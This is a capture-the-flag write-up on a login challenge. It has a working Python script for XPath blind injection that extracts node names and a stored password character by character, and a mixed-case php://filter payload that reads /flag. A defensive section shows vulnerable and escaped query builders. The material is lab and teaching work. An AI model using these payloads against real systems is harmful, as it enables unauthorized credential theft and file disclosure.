The challenge tests XPath injection.

The page is a login form. Entering an arbitrary username and password and clicking login shows "login timed out, please refresh the page"; in the F12 devtools you can see that a token is used, and it refreshes fairly quickly. After refreshing and logging in, capture the request: it goes to login.php and the body is XML. Trying XXE turns out not to work, so XPath blind injection is needed. Reference: XPath injection explained

Testing the injection shows a boolean oracle: if the injected condition is true the page responds with "非法操作" (illegal operation), and if it is false it responds with "用户名或密码错误" (wrong username or password).

The script:

import re
import requests

URL = 'http://0a92d237-bdc8-443b-ae58-0693cf408aac.node3.buuoj.cn/login.php'

def req(username):
    # Each attempt needs a fresh token: fetch the login page and read it
    # out of the hidden form field, then post the XML body in the same session.
    password = ''
    s = requests.session()
    page = s.get(URL).content.decode('utf-8')
    m = re.search(r'value="(.*?)" />', page)
    token = m.group(1)
    headers = {
        'Content-Type': 'application/xml',
    }
    data = ('<username>' + username + '</username>'
            '<password>' + password + '</password>'
            '<token>' + token + '</token>')
    r = s.post(URL, data=data, headers=headers).content
    # "非法操作" (illegal operation) is the response for a true condition
    if '非法操作' in r.decode('utf-8'):
        return 1
    else:
        return 0

# Walk the XML tree level by level: the commented-out payloads were used in
# turn to find the node names (root -> accounts -> user -> username/password),
# then the final one reads the second user's password one character at a time.
flag = ''
for i in range(1, 50):
    print(i)
    for j in range(32, 127):
        #username = "' or substring(name(/*[1]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/*[1]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/*[1]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/user/*[1]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/user/*[2]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/user/*[3]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(/root/accounts/user[1]/username,{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(/root/accounts/user[2]/username,{},1)='{}' or '1".format(i, chr(j))
        username = "' or substring(/root/accounts/user[2]/password,{},1)='{}' or '1".format(i, chr(j))
        if req(username) == 1:
            flag += chr(j)
            print(flag)
            break
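From the defender's side, the blind injection works because login.php splices the submitted username straight into a string literal in its XPath query, so a single quote ends the literal and the rest of the input becomes XPath. The following is an added example, not code from the original post or the challenge; the query shape /root/accounts/user[username='…' and password='…'] is an assumption based on the node names the script enumerated. It shows the vulnerable builder beside a hardened one that emits each input as a proper XPath 1.0 string literal (using concat() when the value mixes quote types), plus a crude check that counts `or` conditions sitting outside string literals.

```python
# Constructed payload with the same shape as the one the script above sends.
PAYLOAD = "' or substring(/root/accounts/user[2]/password,1,1)='a' or '1"


def xpath_literal(value: str) -> str:
    """Return `value` as an XPath 1.0 string literal it cannot break out of.

    XPath 1.0 has no escape sequence inside string literals, so a value that
    contains both ' and " must be assembled with concat().
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    pieces = []
    parts = value.split("'")
    for i, part in enumerate(parts):
        if part:
            pieces.append("'" + part + "'")
        if i < len(parts) - 1:
            pieces.append('"\'"')  # the single quote itself, double-quoted
    return "concat(" + ", ".join(pieces) + ")"


def vulnerable_query(username: str, password: str) -> str:
    # Naive concatenation (assumed shape of the challenge's login.php query):
    # a quote in the input closes the literal and the remainder is parsed as XPath.
    return "/root/accounts/user[username='%s' and password='%s']" % (username, password)


def safe_query(username: str, password: str) -> str:
    # Same query, but every input is emitted as one complete string literal.
    # When lxml is available, binding XPath variables instead of building
    # strings (tree.xpath(query, u=username, p=password)) is the preferred fix.
    return "/root/accounts/user[username=%s and password=%s]" % (
        xpath_literal(username), xpath_literal(password))


def injected_condition_count(query: str) -> int:
    """Count ' or ' tokens outside string literals (crude quote-aware scan)."""
    count, quote = 0, None
    for i, c in enumerate(query):
        if quote:
            if c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif query.startswith(" or ", i):
            count += 1
    return count
```

With PAYLOAD as the username, the vulnerable builder yields two attacker-controlled `or` conditions in the predicate, while the hardened builder keeps the whole payload inside one literal and yields none.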

After obtaining the account and password, log in. Notice ?file=welcome in the URL; in F12 there is the string ZmxhZyBpcyBpbiAvZmxhZwo=, which base64-decodes to say the flag is in /flag. Use the file inclusion: "php" and "base" are filtered, which is bypassed with mixed case: pHp://filter/convert.Base64-encode/resource=/flag. F12 then shows a base64-encoded string; decode it to get the flag.
